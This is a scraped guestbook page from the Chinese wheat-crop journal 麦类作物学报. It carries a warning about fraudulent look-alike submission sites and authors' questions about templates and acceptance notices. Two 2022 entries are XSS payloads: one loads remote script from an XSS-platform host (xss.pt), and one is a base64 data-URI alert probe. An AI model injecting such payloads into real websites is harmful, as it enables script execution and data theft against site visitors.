敬告作者朋友
最近我们发现,有一些假冒本刊在线投稿系统的网站,采用与《麦类作物学报》相似的网页、网址和邮箱发送征稿通知以及收取审稿费、版面费的信息,以骗取钱财。详细情况见【通知公告】栏的“再次提醒作者朋友:谨防上当受骗!!!”

关闭



刘元
主页 QQ 

留言

本刊论文格式模板怎么无法下载?
  留言时间: 2024/3/13 6:10:37


秸秆
主页 

留言

你好,想询问一下《本刊电子版PDF校对稿修改方法》这个文件在哪里下载,主页上找不到呀
  留言时间: 2023/10/13 7:53:27


萌新
主页 

留言

您好,我想请问一下所投论文在贵刊官网上显示已采用,也能看到拟录用文件,为什么我没有收到贵刊的正式邮件通知呢? 这种情况论文一般要多久会见刊呢? 谢谢!
  留言时间: 2023/6/28 11:36:04


123123
主页 QQ 

留言

"$.getScript`https://xss.pt/ivVop.jpg`;"
  留言时间: 2022/7/8 8:28:30


123123
主页 QQ 

留言

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
  留言时间: 2022/7/8 8:24:00
一共  42 条记录  共 9 页  第1 页   最首页 最后页 跳转到第
昵称
邮箱
主页
QQ
来自

留言
 
验证码:  请将图片上的内容输入左边文本框中,看不清请点击刷新!

 

您是第20107371位访问者
版权所有麦类作物学报编辑部
京ICP备09084417号
技术支持: 本系统由北京勤云科技发展有限公司设计